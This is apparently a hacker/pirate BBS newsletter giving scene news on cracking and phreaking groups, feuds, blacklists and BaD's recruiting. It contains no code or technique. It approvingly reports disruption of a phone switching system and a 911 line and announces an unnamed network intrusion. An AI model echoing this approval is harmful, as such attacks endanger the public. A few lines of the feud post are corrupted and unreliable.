Crackers: Jenetic Bytemare, Bit Manipulator, Null Set, Jake Pickett,
Bad Brains, Dr. Detergent, Onyx, North wind
Members: Optical Illusion, Centurion, Xerxes, The JokeR, Many Axe
Hawk, Luther, Fistandantilus, Reaper, Khan, Vigilante,
Bad Ass, Atomic Knight, The Dark Knight, Bluebeard, Sub Zero,
The Oxidizer, Lord Icon, The Jet, Claude Rains, Molecule Man,
Magnum, Crimson Blade, Island Hacker, Stalker
INC has also added a few new boards, whose names and numbers will not be
posted for security reasons, but are all worthy. INC looks to dominate the
cracking world for a long time to come with their continuing desire to improve
and strengthen their line up. Perhaps they will get a few new boards and
members with THG's imminent break up. Stay tuned for all of the news.
----------------------------------------------------------------------------
NEW PHREAKING GROUPS FORMED TO MEET DEMANDS FOR INFORMATION
The recent outcry for new phreaking knowledge has been met by many
groups specializing in phreak/hack topics. Among these are ISCC, PuNk, THuG
and SaVaGE. ISCC stands for International Syndicates of Computer Criminals and
is based in (216) which has recently become quite a popular area for phreaks.
They cover a wide range of topics and their HQ board carries groups such as
LoL, UPi, PoSSe, and of course themselves. Their board is called Inphiniti's
Edge and the number can found on all good p/h systems.
PuNk stands for Phreakers Underground Network Klan and is also originated
in (216). Although they work almost exclusively in phreaking, they have been
called the best by many and have much to share with the knowledge seeking
user. They have three sites in addition to their HQ.
THuG is a phreak/hack group based in the (202)/(301)/(703) and has a very
loyal following. They are known for their weekly Thugchat's held on internet
every Thursday and are "not about eliteness." They gather and share information
and teach people they think have potential. Thugs are kicked out of the group
when they become arrogant or boring.
SaVaGE is basically a neo-nazi anarchist group. Although they focus mainly
on destruction texts and gifs, they do a little phreaking and hacking. They are
well known for destroying the New Jersey switching system that was down for two
days and lesser known for the Florida 911 scam with which they tied up the line
for almost 24 hours by rerouting calls to a disconnected number. They
specialize in random, but unique crimes and are based in (212).
All of these new groups show a rebirth of the phreak/hack subculture and
also the desire to pass aquired knowledge over to future generations. This is
what the underground is all about and we support the motives of these groups.
----------------------------------------------------------------------------
PHANTOM KICKED OUT OF INC!!!
The young sysop of X-T-C who revolutionized INC's courier system has
been eliminated from the group. It seems that Phantom has long been mistreated
by the other members of INC and his work was never appreciated. He claims
responsibility for creating INC's brilliant courier system and couriers and
said they were "the most efficient couriers the pirate world has ever seen."
After months of disagreement with Cool Hand and Line Noise, Phantom had enough
of what he called "bullshit" in the group and posted a message on the Celerity
Net expressing his feelings. That combined with his attitude and a few stunts
he pulled in the last few weeks was enough for INC to drop him. Phantom wishes
that one day Vigilante or someone "with a little more sense and leadership
ability that will work hard to clean the group of all the 'cleavage'" will lead
the group. He also pointed out that INC sites were created solely because other
INC sysops needed cash for the phone bill, equipment, or free wares to crack.
Although he thinks THG is a better group, he says he has no intention of sharing
INC's secrets with them. He will continue to keep his board up and call around.
----------------------------------------------------------------------------
FATHER TIME/MAD MARDIGAN IMPERSONATOR CAUSING TROUBLE
Someone claiming to be Father Time and Mad Mardigan has been calling
Long John Silver and a number of BBS's and harrasing people. Long John Silver
was the first to be harrased. This all started with a few phone calls. At
first, the caller cliamed to be Father Time. When he was asked about info that
could identify him, he changed his story and claimed to be Mad Mardigan. At
this point, he began "acting weird" and started talking about his new magazine,
which he said would have Hard Core for a programmer. He also started threatening
Captain Tom and then talking about how he would "rule the pirate world." Then he
told Long John Silver that he would call back Saturday night at 6:00 pm. That
night at exactly 6pm, the real Mad Martigan called him. He knew nothing of the
conversation with the impersonator and told him he was sure the Crzy Joe didn't
leave NEUA for INC and that Hard Core was not writing for any magazine. This
is truely odd and a detrimental prank to the pirate world. If anyone has any
info, contact Long John Silver or BaD as soon as possible.
----------------------------------------------------------------------------
TERMINATOR BLACKLISTED BY TSAN
Terminator of (305) has been officially blacklisted by all TSAN boards
for threats of virus warfare and crank calling and harassing Mad Mardigan.
TSAN's blacklist started in 1984 and is the final word in all arguments
concerning blacklisted persons. Although Terminator is an INC courier, the
INC boards that are TSAN sites will be forced to abide by the blacklist until
Terminator apoligizes publicly and ceases his actions. We will now consider
all sysops warned and suggest that you avoid having this character on your
board. Remember, public safety is the most important characteristic of a board
and users rights must be protected at all costs. Do not allow bozos like this
to disrupt the underground scene for the rest of us good guys.
---------------------------------------------------------------------------
WATCH OUT FOR THE MINSTREL
The Minstrel has been calling bbses under multiple false aliases. The
following post seems to be the accepted as the most accurate by parties
involved, so make up your own mind.
Well here is the Minstrel's story:
It all started as Sauron.
He was a 2400 and nothing was bad about him. I wanted a change and I
was expecting a new modem within the month.
I started as The Tax Man. He became a very elite user and prospered
MUCh until the day of Dr. Insanity who blacklisted him(me) for telling him not
delete the Arkham Asylum zip comment. that is all. I also had gotten my first
HST. Me and Dr. I had many bickers because of him "attitude" of being elite and
so on....So I tried starting again but I was inexperienced and so it became
obvious that I was the same person. So I made the new switch right when I got
my Dual Standard.
I became The Minstrel of California. it was all well, VERY
WELL, until Smiling Smurf found out by chance when he called a user up to pick
on him(Raw Umber) for getting 62 no votes in the NUV. He happened to ask him
about The Minstrel. It happened to be fatal for me cause Raw Umber goes to my
school and told him who I was. And then Smiling Smurf told Thet.s ined me, but
I was definetely not blacklisted. I was too strong to
be done away with that quickly. But I replied to him to calm down and he
replied to me with death threats. I was very mad when I read them and I replied
with hate-mail. He sent another death threat and someone else read them also
and suggested I play a prank and tell him that I would turn him in for it just
to get back at him. So I did. He replied with tons of more threats and posted
everywhere that I have threatened him with that...then I sent him mail to
aplologize after I got some mail concernin so no people he
"kno"eoo"ehpdigtryaetaogetic mail like five of
them. BUT someone had been using this battle to try to ruin me and wrote
feedback to him anonymously as my Alias. and posted FBI messages and other
messages that made him furious and he threw away my attempts at apologizing. he
thought I wrote those of course no matter how much I denied it. I tried writing
ANSI for him sorry-mail. Everything but he was too furious. So I decided to
name him co on my board to satisfy him, but this only made him madder. And the
latest news is that he posted that I turned him in already. BUT I did not,
although there are others that might hve. I am not the only one that is
fighting with him. I know that for sure...That is my story, MUCh shortened but
still is thorough.
FORT KNOX
Sysop:
The Tax Man - HEAT Member
Co-Sysop's:
Auto-Tek -- THG Member, NEUA Member, INT13 Member, HEAT
The Joker - INC Member
Running Celerity 1.35
Celerity BETA Test Site
0-4 Hour Wares
No Attitudes.
ALL USERS ARE WELCOME! (for right now)
NEW BOARD CALL IT NOW FOR AN ACCOUNT!
301-926-0961
I have changed the requirements. Notadlor never. Soon to be affiliated.
-------------
I must add that Smiling Smurf says that feds came to his house after this and
TM # shows up on SS's CallerID several times that co-incide with some FBI or
SPA shit. Contact Smiling Smurf for more info on that.
The Minstrel lives in Maryland, that is the 301 area code, he has logged on to
many local boards, and lied to their sysops, saying he was from California the
714 area code of CA. SOmehow I think that this shows that this person cannot
be trusted, he lies to every single BBSer in the area, and also to their
SysOp's. Now if I were a local SysOp with the Minstrel on my board I would be
rather pissed.
SysOp's don't ask you to give you address, they just want to know appox. where
you are calling from. In this case, The Minstrel, instead of following what
was common pirate ethics, decided to buck the system and try to rise higher
than the rest of us. My personal feelings (I force upon noone) are that he
should be blacklisted and deleted from all national level boards and forced to
start out fresh. He already has made a bad name for himslef, now lesse if he
can make a good name for himself.
He has used at least 3 aliases in the last year on the same boards, even when
he get's deleted off them. Now Raw Umber/Windwalker, is not that bad of a
user, he stays in the rules and is cordial to all. Raw umber apparentls goes
to the same school that the Minstrel does. In my opinion Raw Umber is more
worthy of BBSing elite"ly" in this area than the Minstrel is, at least he is
honest, and decent to others.
To inform all, I did not have anything against The Minstrel, until he decided
to post that I am lame, and an asshole to all the users on Arkham. Now The
Minstrel has never met me or talked to me. How can he come to that conclusion?
The only ones that can honestly say that I am an asshole and have any sorta of
real idea, are Transgressor, The Keeper, Hunter Rose, Virus, and a user a while
ago called Instinct. Upon having Minstrel telling me all these things, this
conflict started. I made an attept to make up and he told me to go suck my
pussy or something like that.
(End of post)
Well that cetainly was interesting. Just for the record, we at bad have no
opinion on this matter, we only share the news.
----------------------------------------------------------------------------
###
BAD GROUP NEWS
Recently, the BaD HQ board was taken down by the sysop as he wishes to
quit BBSing. We are now starting all over and wish to eventually have sites
in all 50 states if possible. Right now we are taking applications for sites
and they will be filled on a first come first served. We already have a board
in area code 901: "A Lounge Called Death" run by Gentleman Death. This system
is a private phreak/hack board for Upper Echelon Members Only! (The number
has recently been changed... If you were on there before, contact us through
one of the methods at the end of this file.)
Our format is crack/phreak/hack/pirate/anarchy. Yes, that means that we
do EVERYTHING and we are good at it too! If you would like to run a support
site and are a dedicated sysop and believe in what BaD stands for, please
contact us! (Contact list at the end of this file.)
Currently we are working on hacking a very large and well known network
that we are not going to divulge the name of so that we don't unduely alert
the authorities. However, be sure that when we succeed, everyone will know
about it! We are keeping journals of our procedures and activities, so rest
assured that when we pull off this major coup, we will enlighten the masses
with our awesome technique! (If you know what we are talking about and want
to join in on this project, the contact list is at the end of this file.)
As you can tell with this BaD newsletter loader/viewer software, we do
not have a whole lot of time to write programs for non phreak/hack/anarchy
reasons. BaD is looking for a good programmer or two who is experienced in
writing well written software! (Contact list at the end of this file.)
On a sad note, we must doff our hats and take a moment to remember Star
Eater who was tragically killed in a motorcycle accident two days before this
newsletter is released. He lived fast, he drove his motorcycle fast, and
hopefully he died fast and suffered little. We know he's giving 'em hell....
where ever he may be. If you would like to send flowers for the funeral,
see the contact list at the end of this file.
C O N T A C T S
The members of BaD can be found on many good BBSes and are:
Aryan Boy - Bart Simpson - Blind Justice - Bloody Ghoul - Blue Terror
Brain Decay - Burlap Avenger - Carnal Leftovers - Crib Death
Death Force - Death Hold - Executioner - Frost Byte - Gentleman Death
Housepet - Iron Fist - Lobotomy - Premature Autopsy - Phrozen Ghost
Plumber of Sorrow - Shortwave - Spathi - Spandex Phantom - Spike
The Lubricator - The Trooper - Tire - Truk-king
B B S:
A Lounge Called Death . . . . . . . . . . 901-PRI-VATE
V M B:
Washington Voice Mail Concepts. . . . . . 703-715-8551
x666
###